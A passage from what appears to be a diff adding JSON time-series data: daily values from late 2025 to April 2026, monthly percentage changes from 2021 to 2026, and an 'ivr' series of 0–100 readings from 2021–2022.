+ [ + "2025-10-06", + 20352.89573447798 + ], + [ + "2025-10-07", + 19897.645688961395 + ], + [ + "2025-10-08", + 20577.34565830043 + ], + [ + "2025-10-09", + 20482.060313281465 + ], + [ + "2025-10-10", + 19197.472698951733 + ], + [ + "2025-10-13", + 20106.565472169696 + ], + [ + "2025-10-14", + 19694.37028625427 + ], + [ + "2025-10-15", + 20302.0768838012 + ], + [ + "2025-10-16", + 20396.656411449654 + ], + [ + "2025-10-17", + 20339.485204438275 + ], + [ + "2025-10-20", + 20678.27754228348 + ], + [ + "2025-10-21", + 20562.521335056794 + ], + [ + "2025-10-22", + 20054.334986751895 + ], + [ + "2025-10-23", + 20543.464266053 + ], + [ + "2025-10-24", + 20882.256603898204 + ], + [ + "2025-10-27", + 21462.43632399521 + ], + [ + "2025-10-28", + 21488.55156670411 + ], + [ + "2025-10-29", + 21852.047512517198 + ], + [ + "2025-10-30", + 21556.310034273152 + ], + [ + "2025-10-31", + 21636.773214511388 + ], + [ + "2025-11-03", + 21765.93779331487 + ], + [ + "2025-11-04", + 20910.48929871864 + ], + [ + "2025-11-05", + 21560.54493849622 + ], + [ + "2025-11-06", + 20998.008494199075 + ], + [ + "2025-11-07", + 20777.7956330626 + ], + [ + "2025-11-10", + 21315.628469391864 + ], + [ + "2025-11-11", + 20832.143570591936 + ], + [ + "2025-11-12", + 21151.173022062838 + ], + [ + "2025-11-13", + 20424.889106270086 + ], + [ + "2025-11-14", + 20364.18665394325 + ], + [ + "2025-11-17", + 20014.103396632778 + ], + [ + "2025-11-18", + 19549.67772529955 + ], + [ + "2025-11-19", + 19876.469009383163 + ], + [ + "2025-11-20", + 18922.91405874883 + ], + [ + "2025-11-21", + 19115.60004243538 + ], + [ + "2025-11-24", + 19953.40526123175 + ], + [ + "2025-11-25", + 20015.515031373798 + ], + [ + "2025-11-26", + 20566.758397742768 + ], + [ + "2025-11-28", + 20944.36853250316 + ], + [ + "2025-12-01", + 20957.073245172356 + ], + [ + "2025-12-02", + 21374.91497005187 + ], + [ + "2025-12-03", + 21835.107895624937 + ], + [ + "2025-12-04", + 21617.718303970505 + ], + [ + "2025-12-05", + 21837.93116510698 + ], + [ + "2025-12-08", + 22075.085801598623 + ], + [ + "2025-12-09", + 22034.148394108994 + ], + [ + "2025-12-10", + 22327.060444408085 + ], + [ + "2025-12-11", + 22199.307500345625 + ], + [ + "2025-12-12", + 21137.76465048604 + ], + [ + "2025-12-15", + 21034.007338558036 + ], + [ + "2025-12-16", + 20936.887300068327 + ], + [ + "2025-12-17", + 20161.472451591882 + ], + [ + "2025-12-18", + 20642.83773981737 + ], + [ + "2025-12-19", + 21192.058626442704 + ], + [ + "2025-12-22", + 21476.919610099576 + ], + [ + "2025-12-23", + 21556.08555413085 + ], + [ + "2025-12-24", + 21639.495036236814 + ], + [ + "2025-12-26", + 21632.426070217174 + ], + [ + "2025-12-29", + 21581.533831801564 + ], + [ + "2025-12-30", + 21553.2601261859 + ], + [ + "2025-12-31", + 21286.776295717187 + ], + [ + "2026-01-02", + 22173.16635608184 + ], + [ + "2026-01-05", + 22482.059665742592 + ], + [ + "2026-01-06", + 23209.407703748377 + ], + [ + "2026-01-07", + 22964.83874717201 + ], + [ + "2026-01-08", + 22589.499315389527 + ], + [ + "2026-01-09", + 23239.803178401384 + ], + [ + "2026-01-12", + 23350.778390289594 + ], + [ + "2026-01-13", + 23559.296699397237 + ], + [ + "2026-01-14", + 23460.339808973873 + ], + [ + "2026-01-15", + 23836.38289966396 + ], + [ + "2026-01-16", + 24207.47879337175 + ], + [ + "2026-01-20", + 23845.57363472095 + ], + [ + "2026-01-21", + 24608.264344362036 + ], + [ + "2026-01-22", + 24645.72662657178 + ], + [ + "2026-01-23", + 24365.8128398972 + ], + [ + "2026-01-26", + 24249.890431026695 + ], + [ + "2026-01-27", + 24816.07683609917 + ], + [ + "2026-01-28", + 25479.10052102057 + ], + [ + "2026-01-29", + 25526.461514120718 + ], + [ + "2026-01-30", + 24478.20184498934 + ], + [ + "2026-02-02", + 24929.879634395234 + ], + [ + "2026-02-03", + 24431.550986185513 + ], + [ + "2026-02-04", + 23352.898000864032 + ], + [ + "2026-02-05", + 23384.705110258063 + ], + [ + "2026-02-06", + 24634.41843940326 + ], + [ + "2026-02-09", + 24935.53480721095 + ], + [ + "2026-02-10", + 24840.817137936465 + ], + [ + "2026-02-11", + 25460.72552629531 + ], + [ + "2026-02-12", + 24845.76433491876 + ], + [ + "2026-02-13", + 25069.128551899106 + ], + [ + "2026-02-17", + 25029.546659114923 + ], + [ + "2026-02-18", + 25299.563893362003 + ], + [ + "2026-02-19", + 25152.538034005072 + ], + [ + "2026-02-20", + 25406.29556717552 + ], + [ + "2026-02-23", + 25221.809584071754 + ], + [ + "2026-02-24", + 25590.7858672051 + ], + [ + "2026-02-25", + 26012.066023495085 + ], + [ + "2026-02-26", + 25220.393632404917 + ], + [ + "2026-02-27", + 24901.605928779572 + ], + [ + "2026-03-02", + 24884.64041033243 + ], + [ + "2026-03-03", + 23663.91307956213 + ], + [ + "2026-03-04", + 24141.742805546342 + ], + [ + "2026-03-05", + 23874.55315770712 + ], + [ + "2026-03-06", + 22867.293491489665 + ], + [ + "2026-03-09", + 23776.29992619136 + ], + [ + "2026-03-10", + 23948.771904756097 + ], + [ + "2026-03-11", + 24180.618880960013 + ], + [ + "2026-03-12", + 23339.468044658166 + ], + [ + "2026-03-13", + 23419.341964522857 + ], + [ + "2026-03-16", + 23879.50035468942 + ], + [ + "2026-03-17", + 24065.37638790514 + ], + [ + "2026-03-18", + 23926.749107718417 + ], + [ + "2026-03-19", + 24061.840825663865 + ], + [ + "2026-03-20", + 23517.93839164079 + ], + [ + "2026-03-23", + 23806.509773034388 + ], + [ + "2026-03-24", + 24119.836565505626 + ], + [ + "2026-03-25", + 24419.01895054886 + ], + [ + "2026-03-26", + 23259.07177677004 + ], + [ + "2026-03-27", + 22879.26000984475 + ], + [ + "2026-03-30", + 21910.98650064921 + ], + [ + "2026-03-31", + 23245.633186712545 + ], + [ + "2026-04-01", + 23944.4312358506 + ], + [ + "2026-04-02", + 24020.109103824547 + ], + [ + "2026-04-06", + 24337.681592833385 + ], + [ + "2026-04-07", + 24596.548207704138 + ], + [ + "2026-04-08", + 26197.84060895419 + ], + [ + "2026-04-09", + 26779.937044112397 + ], + [ + "2026-04-10", + 27343.643375305004 + ], + [ + "2026-04-13", + 27820.35285904061 + ], + [ + "2026-04-14", + 28379.107676325104 + ], + [ + "2026-04-15", + 28422.95900873886 + ], + [ + "2026-04-16", + 28712.24052442878 + ], + [ + "2026-04-17", + 29402.549338954548 + ], + [ + "2026-04-20", + 29532.689542991888 + ], + [ + "2026-04-21", + 29755.486084227756 + ], + [ + "2026-04-22", + 30538.449077489142 + ], + [ + "2026-04-23", + 31191.274025176095 + ] + ], + "monthly_pct": [ + [ + "2021-05-31", + 1.9703956129815348 + ], + [ + "2021-06-30", + 1.3623649778893299 + ], + [ + "2021-07-31", + 0.9465873849597184 + ], + [ + "2021-08-31", + 1.0534211154479278 + ], + [ + "2021-09-30", + 0.24662697723025762 + ], + [ + "2021-10-31", + 2.38461398615768 + ], + [ + "2021-11-30", + 1.8167567131333051 + ], + [ + "2021-12-31", + 4.230265186461835 + ], + [ + "2022-01-31", + -10.000030889178014 + ], + [ + "2022-02-28", + 7.127866275796113 + ], + [ + "2022-03-31", + 1.847034910229639 + ], + [ + "2022-04-30", + 2.5798230839544134 + ], + [ + "2022-05-31", + 4.132217823859996 + ], + [ + "2022-06-30", + -0.1765829436754518 + ], + [ + "2022-07-31", + 1.4006373245735393 + ], + [ + "2022-08-31", + 1.2607204750375578 + ], + [ + "2022-09-30", + -2.062399696232464 + ], + [ + "2022-10-31", + 0.373992421169711 + ], + [ + "2022-11-30", + 1.7588563143278613 + ], + [ + "2022-12-31", + 1.3626727202858735 + ], + [ + "2023-01-31", + 0.6429984513816045 + ], + [ + "2023-02-28", + 1.050334526582719 + ], + [ + "2023-03-31", + 0.2701469599276418 + ], + [ + "2023-04-30", + 0.22311251152480338 + ], + [ + "2023-05-31", + 0.2583862788740898 + ], + [ + "2023-06-30", + 0.6446582019101088 + ], + [ + "2023-07-31", + 0.8262092732173487 + ], + [ + "2023-08-31", + 1.3705571282013773 + ], + [ + "2023-09-30", + 0.7317015440823305 + ], + [ + "2023-10-31", + 0.2583862788740898 + ], + [ + "2023-11-30", + 0.774681482076911 + ], + [ + "2023-12-31", + 0.2348690548344523 + ], + [ + "2024-01-31", + 1.469928525812203 + ], + [ + "2024-02-29", + 1.1002198248853512 + ], + [ + "2024-03-31", + 2.6874565277616558 + ], + [ + "2024-04-30", + -2.700947125239117 + ], + [ + "2024-05-31", + 2.2069528451666764 + ], + [ + "2024-06-30", + 1.5919816613497284 + ], + [ + "2024-07-31", + 4.365047861074034 + ], + [ + "2024-08-31", + 5.9293158147263325 + ], + [ + "2024-09-30", + -1.5152515376160025 + ], + [ + "2024-10-31", + 1.5957318149076638 + ], + [ + "2024-11-30", + -1.3266972633161567 + ], + [ + "2024-12-31", + 0.3138681460537862 + ], + [ + "2025-01-31", + 2.2355868543106894 + ], + [ + "2025-02-28", + -0.3269627490395943 + ], + [ + "2025-03-31", + -0.8853772978453023 + ], + [ + "2025-04-30", + -2.541012333080117 + ], + [ + "2025-05-31", + 1.229263816525572 + ], + [ + "2025-06-30", + 0.4803475768698995 + ], + [ + "2025-07-31", + 0.25838627887411203 + ], + [ + "2025-08-31", + 0.24662697723025762 + ], + [ + "2025-09-30", + 0.24662697723027982 + ], + [ + "2025-10-31", + 2.480595584358447 + ], + [ + "2025-11-30", + 0.5319417735963894 + ], + [ + "2025-12-31", + 3.4707352163003247 + ], + [ + "2026-01-31", + 1.3508164191987637 + ], + [ + "2026-02-28", + 4.287859271479033 + ], + [ + "2026-03-31", + -0.309008896635532 + ], + [ + "2026-04-30", + 0.18785115449557743 + ] + ], + "ivr": [ + [ + "2021-04-16", + 50.0 + ], + [ + "2021-04-19", + 50.0 + ], + [ + "2021-04-20", + 50.0 + ], + [ + "2021-04-21", + 50.0 + ], + [ + "2021-04-22", + 50.0 + ], + [ + "2021-04-23", + 50.0 + ], + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 50.0 + ], + [ + "2021-04-28", + 50.0 + ], + [ + "2021-04-29", + 50.0 + ], + [ + "2021-04-30", + 50.0 + ], + [ + "2021-05-03", + 50.0 + ], + [ + "2021-05-04", + 50.0 + ], + [ + "2021-05-05", + 50.0 + ], + [ + "2021-05-06", + 50.0 + ], + [ + "2021-05-07", + 50.0 + ], + [ + "2021-05-10", + 50.0 + ], + [ + "2021-05-11", + 50.0 + ], + [ + "2021-05-12", + 50.0 + ], + [ + "2021-05-13", + 50.0 + ], + [ + "2021-05-14", + 50.0 + ], + [ + "2021-05-17", + 0.0 + ], + [ + "2021-05-18", + 0.0 + ], + [ + "2021-05-19", + 0.0 + ], + [ + "2021-05-20", + 45.720106794338015 + ], + [ + "2021-05-21", + 1.318134224358684 + ], + [ + "2021-05-24", + 31.339329662726286 + ], + [ + "2021-05-25", + 31.16136221329315 + ], + [ + "2021-05-26", + 8.629187667168365 + ], + [ + "2021-05-27", + 6.382122633410425 + ], + [ + "2021-05-28", + 0.0 + ], + [ + "2021-06-01", + 0.0 + ], + [ + "2021-06-02", + 0.0 + ], + [ + "2021-06-03", + 19.656529929440868 + ], + [ + "2021-06-04", + 40.41558962368753 + ], + [ + "2021-06-07", + 36.82501399096892 + ], + [ + "2021-06-08", + 0.0 + ], + [ + "2021-06-09", + 1.685288647553888 + ], + [ + "2021-06-10", + 0.0 + ], + [ + "2021-06-11", + 0.0 + ], + [ + "2021-06-14", + 0.0 + ], + [ + "2021-06-15", + 0.2916936811133869 + ], + [ + "2021-06-16", + 0.0 + ], + [ + "2021-06-17", + 0.0 + ], + [ + "2021-06-18", + 3.735826868245875 + ], + [ + "2021-06-21", + 3.4291051685464398 + ], + [ + "2021-06-22", + 0.0 + ], + [ + "2021-06-23", + 0.01736250765520669 + ], + [ + "2021-06-24", + 5.4219897715081515 + ], + [ + "2021-06-25", + 5.535793282539109 + ], + [ + "2021-06-28", + 15.137257807781143 + ], + [ + "2021-06-29", + 14.87059697313676 + ], + [ + "2021-06-30", + 14.634665418044912 + ], + [ + "2021-07-01", + 12.542871830027808 + ], + [ + "2021-07-02", + 3.3643271284493395 + ], + [ + "2021-07-06", + 2.054915928556073 + ], + [ + "2021-07-07", + 5.8889411916917105 + ], + [ + "2021-07-08", + 8.836571048098794 + ], + [ + "2021-07-09", + 11.379002998027737 + ], + [ + "2021-07-12", + 13.621998905414772 + ], + [ + "2021-07-13", + 11.232049494508217 + ], + [ + "2021-07-14", + 9.59648781147429 + ], + [ + "2021-07-15", + 18.18215633550654 + ], + [ + "2021-07-16", + 25.245062418939202 + ], + [ + "2021-07-19", + 14.444159666524634 + ], + [ + "2021-07-20", + 16.966995193570096 + ], + [ + "2021-07-21", + 32.428356915814135 + ], + [ + "2021-07-22", + 34.06437423180851 + ], + [ + "2021-07-23", + 29.9790148078172 + ], + [ + "2021-07-26", + 29.740188119406564 + ], + [ + "2021-07-27", + 24.47851214226438 + ], + [ + "2021-07-28", + 29.190624562589136 + ], + [ + "2021-07-29", + 35.28449752877781 + ], + [ + "2021-07-30", + 32.17254919493508 + ], + [ + "2021-08-02", + 32.220969084564295 + ], + [ + "2021-08-03", + 32.356160514908595 + ], + [ + "2021-08-04", + 29.63471030024773 + ], + [ + "2021-08-05", + 26.473283949534277 + ], + [ + "2021-08-06", + 23.678601843984918 + ], + [ + "2021-08-09", + 22.060567225767073 + ], + [ + "2021-08-10", + 24.53818280311253 + ], + [ + "2021-08-11", + 24.330177891404674 + ], + [ + "2021-08-12", + 17.710648698925738 + ], + [ + "2021-08-13", + 5.885159031412961 + ], + [ + "2021-08-16", + 6.669861918442438 + ], + [ + "2021-08-17", + 13.478800726078171 + ], + [ + "2021-08-18", + 0.0 + ], + [ + "2021-08-19", + 0.3602342316990277 + ], + [ + "2021-08-20", + 0.3913595719541807 + ], + [ + "2021-08-23", + 14.788495337914654 + ], + [ + "2021-08-24", + 6.751936144901233 + ], + [ + "2021-08-25", + 2.4971397237382464 + ], + [ + "2021-08-26", + 0.0 + ], + [ + "2021-08-27", + 6.565652259334474 + ], + [ + "2021-08-30", + 6.126584601343289 + ], + [ + "2021-08-31", + 7.3312084307914525 + ], + [ + "2021-09-01", + 4.755008628857654 + ], + [ + "2021-09-02", + 4.746888483613621 + ], + [ + "2021-09-03", + 5.34506213651281 + ], + [ + "2021-09-07", + 5.3269004677403125 + ], + [ + "2021-09-08", + 5.703722373500786 + ], + [ + "2021-09-09", + 5.879843755524478 + ], + [ + "2021-09-10", + 3.2550116703972107 + ], + [ + "2021-09-13", + 3.900285845046693 + ], + [ + "2021-09-14", + 3.3362072791107056 + ], + [ + "2021-09-15", + 0.0 + ], + [ + "2021-09-16", + 0.0 + ], + [ + "2021-09-17", + 7.556882171048088 + ], + [ + "2021-09-20", + 20.71087469739171 + ], + [ + "2021-09-21", + 7.777570571785403 + ], + [ + "2021-09-22", + 15.408373943312641 + ], + [ + "2021-09-23", + 17.23477461576802 + ], + [ + "2021-09-24", + 17.259110334747263 + ], + [ + "2021-09-27", + 10.717373021885864 + ], + [ + "2021-09-28", + 34.55532795146353 + ], + [ + "2021-09-29", + 37.18474552484415 + ], + [ + "2021-09-30", + 37.1488562089792 + ], + [ + "2021-10-01", + 36.92330707025438 + ], + [ + "2021-10-04", + 42.84111392091566 + ], + [ + "2021-10-05", + 47.28712325196112 + ], + [ + "2021-10-06", + 46.257738914240214 + ], + [ + "2021-10-07", + 48.07577252650927 + ], + [ + "2021-10-08", + 47.41342745890573 + ], + [ + "2021-10-11", + 45.79187299203113 + ], + [ + "2021-10-12", + 46.46846061468107 + ], + [ + "2021-10-13", + 46.56389313258522 + ], + [ + "2021-10-14", + 60.27384234070217 + ], + [ + "2021-10-15", + 58.82925643444356 + ], + [ + "2021-10-18", + 52.56147201323918 + ], + [ + "2021-10-19", + 54.296003814080166 + ], + [ + "2021-10-20", + 49.023711665767586 + ], + [ + "2021-10-21", + 48.106280240741974 + ], + [ + "2021-10-22", + 49.559988506316465 + ], + [ + "2021-10-25", + 50.496687070772275 + ], + [ + "2021-10-26", + 29.082114089550625 + ], + [ + "2021-10-27", + 24.69569112830347 + ], + [ + "2021-10-28", + 30.836415015259135 + ], + [ + "2021-10-29", + 30.754707584961906 + ], + [ + "2021-11-01", + 18.478666759560724 + ], + [ + "2021-11-02", + 17.789737282658017 + ], + [ + "2021-11-03", + 18.520635279875965 + ], + [ + "2021-11-04", + 30.806529534756173 + ], + [ + "2021-11-05", + 26.92912416006858 + ], + [ + "2021-11-08", + 23.19013123248801 + ], + [ + "2021-11-09", + 17.413930435304515 + ], + [ + "2021-11-10", + 39.45862521392781 + ], + [ + "2021-11-11", + 34.62589208819058 + ], + [ + "2021-11-12", + 34.682965579987886 + ], + [ + "2021-11-15", + 35.58503669817021 + ], + [ + "2021-11-16", + 36.288980512297435 + ], + [ + "2021-11-17", + 38.54678303515325 + ], + [ + "2021-11-18", + 40.12672953839731 + ], + [ + "2021-11-19", + 35.281653457699306 + ], + [ + "2021-11-22", + 42.715056580284546 + ], + [ + "2021-11-23", + 43.38702879330808 + ], + [ + "2021-11-24", + 41.12424123779578 + ], + [ + "2021-11-26", + 52.91429505863747 + ], + [ + "2021-11-29", + 65.87039495763398 + ], + [ + "2021-11-30", + 71.11478172208889 + ], + [ + "2021-12-01", + 72.00428756164403 + ], + [ + "2021-12-02", + 71.31863375755351 + ], + [ + "2021-12-03", + 60.11555774588969 + ], + [ + "2021-12-06", + 59.189272731091236 + ], + [ + "2021-12-07", + 83.44096016883273 + ], + [ + "2021-12-08", + 84.07733219316482 + ], + [ + "2021-12-09", + 80.54117259679637 + ], + [ + "2021-12-10", + 77.17674916331026 + ], + [ + "2021-12-13", + 84.1755400229581 + ], + [ + "2021-12-14", + 84.37913294413968 + ], + [ + "2021-12-15", + 94.39618002263308 + ], + [ + "2021-12-16", + 100.0 + ], + [ + "2021-12-17", + 97.14817002053286 + ], + [ + "2021-12-20", + 97.24190733600042 + ], + [ + "2021-12-21", + 100.0 + ], + [ + "2021-12-22", + 100.0 + ], + [ + "2021-12-23", + 99.90745457269158 + ], + [ + "2021-12-27", + 98.12277683329542 + ], + [ + "2021-12-28", + 90.05423672038425 + ], + [ + "2021-12-29", + 86.99575703120989 + ], + [ + "2021-12-30", + 87.86816580019709 + ], + [ + "2021-12-31", + 87.95508850611795 + ], + [ + "2022-01-03", + 90.19098598750122 + ], + [ + "2022-01-04", + 90.47351633521684 + ], + [ + "2022-01-05", + 80.46996418263677 + ], + [ + "2022-01-06", + 80.90840159369075 + ], + [ + "2022-01-07", + 83.70941921390127 + ], + [ + "2022-01-10", + 83.00869403651507 + ], + [ + "2022-01-11", + 80.42703678693394 + ], + [ + "2022-01-12", + 80.4316047090711 + ], + [ + "2022-01-13", + 74.04166977991106 + ], + [ + "2022-01-14", + 61.88145229280065 + ], + [ + "2022-01-18", + 79.38408688067537 + ], + [ + "2022-01-19", + 86.13667158973044 + ], + [ + "2022-01-20", + 81.45856566205721 + ], + [ + "2022-01-21", + 80.60338300322746 + ], + [ + "2022-01-24", + 81.44128592856981 + ], + [ + "2022-01-25", + 79.28268847445385 + ], + [ + "2022-01-26", + 84.0469081879977 + ], + [ + "2022-01-27", + 93.35063045535132 + ], + [ + "2022-01-28", + 99.08408783185449 + ], + [ + "2022-01-31", + 100.0 + ], + [ + "2022-02-01", + 97.8431464602285 + ], + [ + "2022-02-02", + 100.0 + ], + [ + "2022-02-03", + 100.0 + ], + [ + "2022-02-04", + 99.82989478249368 + ], + [ + "2022-02-07", + 97.14829500180771 + ], + [ + "2022-02-08", + 100.0 + ], + [ + "2022-02-09", + 100.0 + ], + [ + "2022-02-10", + 100.0 + ], + [ + "2022-02-11", + 100.0 + ], + [ + "2022-02-14", + 96.90801067641038 + ], + [ + "2022-02-15", + 100.0 + ], + [ + "2022-02-16", + 96.94435730810814 + ], + [ + "2022-02-17", + 98.41352785144929 + ], + [ + "2022-02-18", + 97.83547595333243 + ], + [ + "2022-02-22", + 97.37256659745877 + ], + [ + "2022-02-23", + 94.1324584974626 + ], + [ + "2022-02-24", + 98.1456339818726 + ], + [ + "2022-02-25", + 90.6636481140537 + ], + [ + "2022-02-28", + 90.0559035904064 + ], + [ + "2022-03-01", + 84.23222053074608 + ], + [ + "2022-03-02", + 88.07289774323273 + ], + [ + "2022-03-03", + 86.71243682618159 + ], + [ + "2022-03-04", + 81.56547252120025 + ], + [ + "2022-03-07", + 89.29801714072295 + ], + [ + "2022-03-08", + 91.08236698166908 + ], + [ + "2022-03-09", + 95.20464752258115 + ], + [ + "2022-03-10", + 91.40555957016758 + ], + [ + "2022-03-11", + 90.08975518003064 + ], + [ + "2022-03-14", + 85.0717997420459 + ], + [ + "2022-03-15", + 93.04782325440428 + ], + [ + "2022-03-16", + 91.70369896615314 + ], + [ + "2022-03-17", + 91.92752172460446 + ], + [ + "2022-03-18", + 88.52331952178825 + ], + [ + "2022-03-21", + 88.09953284833036 + ], + [ + "2022-03-22", + 87.78576704428971 + ], + [ + "2022-03-23", + 87.99744219555706 + ], + [ + "2022-03-24", + 91.55541133707551 + ], + [ + "2022-03-25", + 90.90479672670084 + ], + [ + "2022-03-28", + 90.73526410110271 + ], + [ + "2022-03-29", + 86.271974171298 + ], + [ + "2022-03-30", + 87.53997152552968 + ], + [ + "2022-03-31", + 87.43106697718316 + ], + [ + "2022-04-01", + 86.81589106013125 + ], + [ + "2022-04-04", + 76.1296977155863 + ], + [ + "2022-04-05", + 84.60970034248456 + ], + [ + "2022-04-06", + 80.73467901392908 + ], + [ + "2022-04-07", + 79.10669201314545 + ], + [ + "2022-04-08", + 79.6995856380891 + ], + [ + "2022-04-11", + 77.83513981006227 + ], + [ + "2022-04-12", + 69.67997046828923 + ], + [ + "2022-04-13", + 59.501563954950896 + ], + [ + "2022-04-14", + 61.83515897767292 + ], + [ + "2022-04-18", + 61.32950274398959 + ], + [ + "2022-04-19", + 64.60604667960254 + ], + [ + "2022-04-20", + 64.19862460275858 + ], + [ + "2022-04-21", + 64.65587062541415 + ], + [ + "2022-04-22", + 50.624361058703315 + ], + [ + "2022-04-25", + 53.50435729067349 + ], + [ + "2022-04-26", + 58.13003462464887 + ], + [ + "2022-04-27", + 52.687475040064015 + ], + [ + "2022-04-28", + 70.0828414754364 + ], + [ + "2022-04-29", + 74.87303701203182 + ], + [ + "2022-05-02", + 80.72905004089878 + ], + [ + "2022-05-03", + 79.75250598471342 + ], + [ + "2022-05-04", + 80.18724236007341 + ], + [ + "2022-05-05", + 86.48305589400678 + ], + [ + "2022-05-06", + 86.58200656351963 + ], + [ + "2022-05-09", + 93.52096277427428 + ], + [ + "2022-05-10", + 94.92837434660213 + ], + [ + "2022-05-11", + 97.60789331201192 + ], + [ + "2022-05-12", + 95.32968634213125 + ], + [ + "2022-05-13", + 100.0 + ], + [ + "2022-05-16", + 99.54710224443907 + ], + [ + "2022-05-17", + 100.0 + ], + [ + "2022-05-18", + 100.0 + ], + [ + "2022-05-19", + 98.51296164770218 + ], + [ + "2022-05-20", + 97.38923478198804 + ], + [ + "2022-05-23", + 96.61143145047578 + ], + [ + "2022-05-24", + 93.62499691492941 + ], + [ + "2022-05-25", + 94.5079025111413 + ], + [ + "2022-05-26", + 90.29336204709621 + ], + [ + "2022-05-27", + 88.74093456511358 + ], + [ + "2022-05-31", + 86.1575475782034 + ], + [ + "2022-06-01", + 86.80740577626904 + ], + [ + "2022-06-02", + 86.04819699446942 + ], + [ + "2022-06-03", + 81.62852315375292 + ], + [ + "2022-06-06", + 81.30840153734196 + ], + [ + "2022-06-07", + 71.85797644760757 + ], + [ + "2022-06-08", + 72.94110916209033 + ], + [ + "2022-06-09", + 72.08649969145017 + ], + [ + "2022-06-10", + 76.6529184702206 + ], + [ + "2022-06-13", + 76.94637910648483 + ], + [ + "2022-06-14", + 76.70866059846996 + ], + [ + "2022-06-15", + 68.62824217396548 + ], + [ + "2022-06-16", + 72.12271092670822 + ], + [ + "2022-06-17", + 72.37827416309418 + ], + [ + "2022-06-21", + 75.55326599669408 + ], + [ + "2022-06-22", + 75.45245980323747 + ], + [ + "2022-06-23", + 74.13171506569479 + ], + [ + "2022-06-24", + 79.24465449924108 + ], + [ + "2022-06-27", + 73.61215724343185 + ], + [ + "2022-06-28", + 67.74295474575845 + ], + [ + "2022-06-29", + 68.45562084112736 + ], + [ + "2022-06-30", + 68.32070940595926 + ], + [ + "2022-07-01", + 63.816008020058504 + ], + [ + "2022-07-05", + 63.942149435656816 + ], + [ + "2022-07-06", + 64.615981322279 + ], + [ + "2022-07-07", + 73.24502728957299 + ], + [ + "2022-07-08", + 72.9960327647921 + ], + [ + "2022-07-11", + 72.69510382884363 + ], + [ + "2022-07-12", + 69.86820514195166 + ], + [ + "2022-07-13", + 59.86069799824588 + ], + [ + "2022-07-14", + 61.339669989753595 + ], + [ + "2022-07-15", + 62.40848090617551 + ], + [ + "2022-07-18", + 47.447443830747574 + ], + [ + "2022-07-19", + 54.71429654014634 + ], + [ + "2022-07-20", + 54.346350298910174 + ], + [ + "2022-07-21", + 53.84961834158386 + ], + [ + "2022-07-22", + 56.95146100075084 + ], + [ + "2022-07-25", + 51.20829168594682 + ], + [ + "2022-07-26", + 52.60177390250864 + ], + [ + "2022-07-27", + 56.630468553683954 + ], + [ + "2022-07-28", + 53.43103908700474 + ], + [ + "2022-07-29", + 52.07584921793702 + ], + [ + "2022-08-01", + 42.72468551328401 + ], + [ + "2022-08-02", + 43.258919955619334 + ], + [ + "2022-08-03", + 44.57876420629303 + ], + [ + "2022-08-04", + 38.83960575145307 + ], + [ + "2022-08-05", + 40.00392867370521 + ], + [ + "2022-08-08", + 37.78823427415506 + ], + [ + "2022-08-09", + 50.46448126509498 + ], + [ + "2022-08-10", + 55.40011284613511 + ], + [ + "2022-08-11", + 55.126882106104944 + ], + [ + "2022-08-12", + 56.11368772979751 + ], + [ + "2022-08-15", + 55.694551334934964 + ], + [ + "2022-08-16", + 50.38873006783996 + ], + [ + "2022-08-17", + 51.79597273903996 + ], + [ + "2022-08-18", + 52.70280195062177 + ], + [ + "2022-08-19", + 53.19557849651514 + ], + [ + "2022-08-22", + 58.69284708299146 + ], + [ + "2022-08-23", + 57.543142757113465 + ], + [ + "2022-08-24", + 49.053575541726076 + ], + [ + "2022-08-25", + 53.97031806885509 + ], + [ + "2022-08-26", + 65.67905849831766 + ], + [ + "2022-08-29", + 66.47943648916639 + ], + [ + "2022-08-30", + 66.73604059829627 + ], + [ + "2022-08-31", + 63.11407373007212 + ], + [ + "2022-09-01", + 62.91033324010261 + ], + [ + "2022-09-02", + 62.919505646619655 + ], + [ + "2022-09-06", + 62.72439138081555 + ], + [ + "2022-09-07", + 58.29489922138607 + ], + [ + "2022-09-08", + 51.59513332889782 + ], + [ + "2022-09-09", + 54.98752212443673 + ], + [ + "2022-09-12", + 50.13980295419317 + ], + [ + "2022-09-13", + 60.97214388017783 + ], + [ + "2022-09-14", + 62.19630857117059 + ], + [ + "2022-09-15", + 61.253569409451245 + ], + [ + "2022-09-16", + 56.78580030884361 + ], + [ + "2022-09-19", + 55.77752653264416 + ], + [ + "2022-09-20", + 52.123163005173204 + ], + [ + "2022-09-21", + 50.92476751316837 + ], + [ + "2022-09-22", + 52.2043390695112 + ], + [ + "2022-09-23", + 43.44619128371501 + ], + [ + "2022-09-26", + 31.96033588238984 + ], + [ + "2022-09-27", + 30.27050730912542 + ], + [ + "2022-09-28", + 31.77817918789923 + ], + [ + "2022-09-29", + 34.51433436900822 + ], + [ + "2022-09-30", + 34.03578207856654 + ], + [ + "2022-10-03", + 40.63517496131798 + ], + [ + "2022-10-04", + 50.948500487762196 + ], + [ + "2022-10-05", + 50.471155681670595 + ], + [ + "2022-10-06", + 49.04574383439177 + ], + [ + "2022-10-07", + 57.92721558004177 + ], + [ + "2022-10-10", + 60.19052289708393 + ], + [ + "2022-10-11", + 50.47460849819099 + ], + [ + "2022-10-12", + 49.17593509905363 + ], + [ + "2022-10-13", + 54.615071033723815 + ], + [ + "2022-10-14", + 59.85090847430881 + ], + [ + "2022-10-17", + 61.984544845230246 + ], + [ + "2022-10-18", + 62.174212579905394 + ], + [ + "2022-10-19", + 62.87171888855055 + ], + [ + "2022-10-20", + 61.59386074306998 + ], + [ + "2022-10-21", + 67.26661855257434 + ], + [ + "2022-10-24", + 66.52523855363195 + ], + [ + "2022-10-25", + 68.04579904397379 + ], + [ + "2022-10-26", + 67.74922237161148 + ], + [ + "2022-10-27", + 65.94955140015337 + ], + [ + "2022-10-28", + 70.01219449163712 + ], + [ + "2022-10-31", + 68.31949138419272 + ], + [ + "2022-11-01", + 60.178099622926865 + ], + [ + "2022-11-02", + 62.42101872924105 + ], + [ + "2022-11-03", + 62.75725416083132 + ], + [ + "2022-11-04", + 59.337058307201474 + ], + [ + "2022-11-07", + 55.90352174654086 + ], + [ + "2022-11-08", + 52.34961603578626 + ], + [ + "2022-11-09", + 52.48016753195941 + ], + [ + "2022-11-10", + 85.70234536263173 + ], + [ + "2022-11-11", + 76.69089309906687 + ], + [ + "2022-11-14", + 78.27281810239116 + ], + [ + "2022-11-15", + 79.1190466133171 + ], + [ + "2022-11-16", + 88.61883681512856 + ], + [ + "2022-11-17", + 88.59934001812346 + ], + [ + "2022-11-18", + 85.77551327443824 + ], + [ + "2022-11-21", + 87.153878795875 + ], + [ + "2022-11-22", + 87.92326199511518 + ], + [ + "2022-11-23", + 87.00448797227475 + ], + [ + 